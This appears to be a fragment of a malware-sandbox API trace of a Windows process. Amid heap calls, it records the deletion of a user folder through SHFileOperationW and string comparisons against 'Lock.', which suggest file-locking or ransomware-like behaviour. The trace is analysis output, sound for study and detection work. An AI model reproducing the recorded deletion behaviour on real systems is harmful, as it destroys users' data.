(in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f7878 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722f8 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa588 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa600 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x18) returned 0x29f6fc0 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x60) returned 0x2a74a50 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a77af8 | out: hHeap=0x2af0000) returned 1 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa558 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa558 | out: hHeap=0x2af0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0206.251] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.251] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x29f6fc0 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72218 | out: hHeap=0x2af0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7f8 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7b0 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72358 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72358 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7b0 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72318 | out: hHeap=0x2af0000) returned 1 [0206.252] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x48) returned 0x2a5d7f0 [0206.252] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", nBufferLength=0x104, lpBuffer=0x8cf65c, lpFilePart=0x8cf650 | out: lpBuffer="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", lpFilePart=0x8cf650*="LWx-lTCW5BQnV") returned 0x23 [0206.252] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5d7f0 | out: hHeap=0x2af0000) returned 1 [0206.252] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV" (normalized: "c:\\users\\fd1hvy\\music\\lwx-ltcw5bqnv")) returned 0x10 [0206.252] SHFileOperationW (in: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ") | out: lpFileOp=0x8cf868*(hwnd=0x0, wFunc=0x3, pFrom="C:\\Users\\FD1HVy\\Music\\LWx-lTCW5BQnV", pTo=0x0, fFlags=0x614, fAnyOperationsAborted=0, hNameMappings=0x0, lpszProgressTitle="籨ǿ畍䑬癩噗ֽ㣚ᵗ˷殍Ķᐊ둲?ᒰ陣ꙭ䐫୥垇摩䱥呲훷뭬뙯䋈䡹氨犖灣뉹᙭捦㸩㵓穬㡗标公ᒞ◶쁆⋓畑臞涃秘ِ໩㘍潸ѵ噾බ⼄䘗똆伜陰嬈ᬡ㞙䦽箣㤵칗ஆ룑䴻⪱谐໅┺㎻ꌇᐟፓ潐?涟鷮掊鼥䘕畬띳贂梕畂笛贆襔꿡惿濸桬汥㍰匲瀺潨魫盙䕰舤瑴⅗恓覠쉎吋眶蘏큩[瑁扴獵惏ꋗ䁳倠㍹쐟н蹣최維矓ꜯᐝ낆쪆㍶䢢䶇?儕⏁㮰剭蔣飇䥬䇻栵刬洠傧겴玀뱢颻㝤䱶慯ᬝ正捓䛚껐景䔟螃䄉᭤慎항ာ션Ѱ卧脮样ᯋ좐㈶퐨譁옙ꛬ﹡̻婃籙밚䙩虓䔁ㆣ芵⮣鱌坶ぉᖴ얶䄵ꙴ嬣厶챰礟摴턦䡡轫楐挦梧൜栆?땋䞎罋怦똱砕⑐坨⨛蜎培껛铕닥璍嶫਺Җᒖꊵ䞉啰㝍檑⣅昩궬榶䔌㜵끛ꬅ㥭⡑汒酯墣엘≩ᵷ뜱॥ጐᜫ⼯떱垴ㅵ䓺둘㭡礚㥰獼噫굻獰慞塣?喆◍䁖艵༜喻䰭扡튚앱䞘狒䱤毈惌ⱶ潪幃呰Ṕ䵤囌⡘솆醥䵅㋱倓콬鬕쁮Ϛ꒚溔嚸槐탲셱⌖䜱押㶬짌ꄖ唗汮촛坩䔎핽?龎ଗȀ涌ꋦಮ퀻䋝ᄀᘇ㠜픭状梙涏⋣珙⍏㨬ᭂᰯ專ࢋꕅ̋瀮뾊ㅫ쟆揥厪塹祼췚ࢡ砕턎?黩ᢰ㝬嗢擴ຊ瓛艡ᵓ蛛왡落ꪺᯙ畄⁣錮굽춡ꏤᕘ媤估⋇辰鼠摁Ɽ≏٬䇦ᬋ퇡嘬힕≏๬挌嗗읓䦻㡳靮ᜃ爄칐ᕷ됆党ꟑ൩᥯맱獁죚⒀덍륍ⷜ篭ἐᒜ壸精鰥Ḯ茋᲎饰䏘໛u䙤痐붮⥅攖┱傌﮼쾳ᕡᙁ伏䵅舒硖鎀䱨懇䱛เ邏ጶᶐ匙씆Ĕ叧葿⼑㪚票⥤녋᣷㥏ト㖀玳鑴煯缡ά웯勗㤹㸙湛嘒᭐Ԏ៬䱓䵃Ϊ瑒䈬꺜瞔ᾰȄ凘娩捸?犺䶽삕Ⅵֶ逯끘慁熰睊侳ก쬬Ľ佤㑦磦༆礛ᅐ힠나敯硇⴨၈밈⬗뗴롧坃㌝둺䬫䬡睥蕝껢ᡮ᲍肽勂ᾄ䄅?ઔ煗簼鳥ꝸቮ椒ꗎ抄皁詽汲ᔩ뚌愇렩慪枰蓺ꭆ吋歯餔୪출렣☎䜅츐槞枌ࠂ뫞䶅鼴㐂ⴰ䯘쭗ꁸ萵棜枞ϰℴ畺惫ɣ脠∻ҍ䅸汣笿梗旲撒ᆣ삗芭퇛뽌䭯귭㿣⦃曥ସ㛭?⑛讔ﬔ?匏ٻ扸ต靿虹뜄魔檆獵ꄣ㣧㠬??桓໪샤瑵槐原⋮竻湤爦붧㒭Ȃ䦌㱭蕌ᶁﻣ齟匣oᡜ㡬怭揮㭠求㽮ᄩ➚὜⦇什㶃綄祜≐⌸⯺໖{䦝ꁣभܛ릻?뤊㻇령컃및܆ᜆᒅ쪩웓圜堣제?䲄Ꮭⱁ᎙牁ୣ둸娸㏯鈲椞琌㋱軽䅜ᴈ낲攣ᜥ?魤⦰椦퉸嫽䌚䃤ࡧ䏽ఈ䁊誽Ồ꧜강⽰䍄亄瑣䷍꓋档求䓛鸥瑰⇷᱃ܜ옲黏띝쬎䞏쬕㠦҉ꬆ剺⻂퀖祬睆蓿鯃剻懤ℱ敩?汽퀓牏뉧⾞ϰ⤖䉅鍫湒泮㐓⭱魃솭냊睳匕蜮탧嘪牂册䟥煱唰᭗썆፪丞ꋃ君丈꣎ଦ?圓끎漞쪱沀堁⽺햵皖⥸簧籑?琫멑쀗괂俱ʦ畮혙⁰䴩婫摲顑采鲲쵹潓ーꃢ䑡?卌䑉⹆⎳乴཭༠⤣ƀ䟚㉕褲旇찘᭴ὕㄹ̆䚑쯴ꂙ옻⫭修䡮冧戈툔뙫ᾥڂⅼᅧ?䇁弣꯯⭤ꓸꡂ硴潭萕ᰊ佋?䨣ฦ硬䱹켄撚欦휖䦫ꞟ〢頧೿驩榦଄ₒ؟퍍괴⠦ᠧ┇꘣퍹ꐴ鬩!ਂꚚ驩뤉䷜អ퉸歏ꀈ偅ࠔ㲽냅଄慂╳ꌂ㶒?燚獣侪腵沓妣ၸ樔?琬瑖ោ县⹈撸㝆퍈煮㐴䖍沔捹蛡減㨧ΰ鞸?❷ꉡ?摛襾ꮷ䞃ݡ踘⬰歆뱲䕥灀❹慍〟贤騁똔ᰟ杅也ꩯ祦䅪圩斍伩ፁ뺲ꁛ㰯샤莢?『떂䣘኎槦妙膎Ӟၤ⹝潢劊끯골ḱ쫩ꄸ쓆咬ੰ丛윜㢎⣖⥣唛劫쮪灰❇삁Ҩ叮扵䌥䀶?違浳潚᱊㣰﹀械큫?偮礩?黠랭ꯨ栞柠䢍粙턭ⴜ斔舝⵨勥촐롤呯Ṱ琞溁耱Ɽ쑲겍Ꙑﻑ龜遮企ল月墡Ǡゑ⾌逝ၖᵳ꘨튡歛洔ᵉ뀣?㘈倷鹴呋૗榞〗앢桁禣죇ᒁ?낰㎇၍੆뢲Ըāʼnꈛꏔ沐蚃녨奦呤豇嫀洜䉕㭔ⵠ刃핵᛭屎藡롃顃杬ᙂ噴?榇霫⡦Ұ枌᭔୻㪝뜊뜗⌋⎭瀕캵챩쯍䀥꠷ọ덠ቭ徠嵥㴮筴Ꮌ匷?ഊ☓気?솟ṩ퀉?靄等硢긜蠉Ἥ㸉蟜ᥩ좧鳪³῭닢ᰫᎥ穗℞刕曚ꂱ箰뜩癛훇ꔶ᷍⍓䜛㕗驀㐿狢๤茇贅啁級ஐ捗歡䍺㴙藌䘵릙्抩쐸㒪᲍蒛ⵣ᭝拴緋ᛞ䟈嘙ᝫ졣屩)䌍Ў鐄㋵ㄥ딮⃠更᥼ሼ䆼訟뗭涆児錧餝娆ࠡ侏ꛜౕ쌫裊팛浏៑ֻ釆攣뭙桙ᡩᏱ폪腚Ⅴ楖楳㏕㊺농፟䖀䟙곯꣢칣棘㕛ⷀΪ㔝虘ऌ펾潔羣ᙱ뀩泒ﯤ䔠蠂㠪Ϲ肾魐垜唬⤘ꅀ숛찈䏷ຈ㊽ꗋ䱛ᮄ耸鏑뢉ŝ䘭?瘹䢄묑䞇똭᫁笉ᯥ㖤퀑љ榔䗋㥁嵭䵘뾧ڊ╛漫热쯙㉧缿囓ꇰ焋뮁뇺Š턅炿셹穎щ휢뒬跕鈧䞂껑砭玿䷋酇蹢殲鑁ɚ뤏禟⥂큸⵽爲堤獀ऀ賣웕삮ౕᡡ濏씸探厱?畑ࢇꗇ靚ﱋ뇩ﮆ癡?匈떍斜ᅭ쁄䝮蹽勂羁䥽Ự봣ᕱځ⸕ꤗ叙᪱䜰퍯驁椾倯殞豘੸唿牮㓇ꛠⶍ歵搞⥔⋄촭䞹ꐄ齚?莬ꁓ졦?ࣚ혮疗ㄫ鎀锽针虚℅뱗⡲ꂃ㠼⇶宄﵇敗櫀䠟ㄥЩ嘎續둈舅뿽䱮⌻?肊⥍殻湏ᷚ⍓濉耹৫喦䍈炠嵅?⮖ꝃ?̴⎄⌝䕆ࡖ٤ᬻ砓㝫㌈쯪飳?㴨資伪᫃蒊晴貣È퐳䈄렉栁ⶅ惂吡楣ﴴ榦ꞟ鑮ヤҗ༕괴骃ᐑቻഄ퍳䴴˓Ѓ጗ꡚ偵뵴Ё⥯ꐴऔӓ뜹붼䔤䰶吁뫬伥翳氁⌀ଁਁ")) returned 0 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a74a50 | out: hHeap=0x2af0000) returned 1 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa540 | out: hHeap=0x2af0000) returned 1 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7f8 | out: hHeap=0x2af0000) returned 1 [0207.017] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa5a0 | out: hHeap=0x2af0000) returned 1 [0207.017] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 1 [0207.017] TranslateMessage (lpMsg=0x8cf968) returned 0 [0207.017] DispatchMessageW (lpMsg=0x8cf968) returned 0x0 [0207.017] KillTimer (hWnd=0xa02be, uIDEvent=0x1) returned 1 [0207.017] SetTimer (hWnd=0xa02be, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0207.017] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a5eb00 | out: hHeap=0x2af0000) returned 1 [0207.018] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.018] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72288 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a721d8 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72298 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72268 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72268 | out: hHeap=0x2af0000) returned 1 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72298 | out: hHeap=0x2af0000) returned 1 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72338 [0207.018] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72338 | out: hHeap=0x2af0000) returned 1 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="orL7CLboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rL7CLboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 3 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="L7CLboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="7CLboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="CLboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.018] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="LboBO", cchCount1=5, lpString2="Lock.", cchCount2=5) returned 1 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa7e0 | out: hHeap=0x2af0000) returned 1 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa720 | out: hHeap=0x2af0000) returned 1 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa798 | out: hHeap=0x2af0000) returned 1 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa768 | out: hHeap=0x2af0000) returned 1 [0207.018] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2aaa708 | out: hHeap=0x2af0000) returned 1 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a721d8 | out: hHeap=0x2af0000) returned 1 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72288 | out: hHeap=0x2af0000) returned 1 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x38) returned 0x2a5ecc0 [0207.019] PeekMessageW (in: lpMsg=0x8cf968, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf968) returned 0 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72318 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa600 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa798 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72388 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722c8 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722c8 | out: hHeap=0x2af0000) returned 1 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa708 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72388 | out: hHeap=0x2af0000) returned 1 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa720 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a72278 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa588 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a72278 | out: hHeap=0x2af0000) returned 1 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa768 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x8) returned 0x2a722d8 [0207.019] RtlAllocateHeap (HeapHandle=0x2af0000, Flags=0x0, Size=0x10) returned 0x2aaa7e0 [0207.019] HeapFree (in: hHeap=0x2af0000, dwFlags=0x0, lpMem=0x2a722d8 | out: hHeap=0x2af0000) returned 1 [0207.019] RtlAllocateHeap 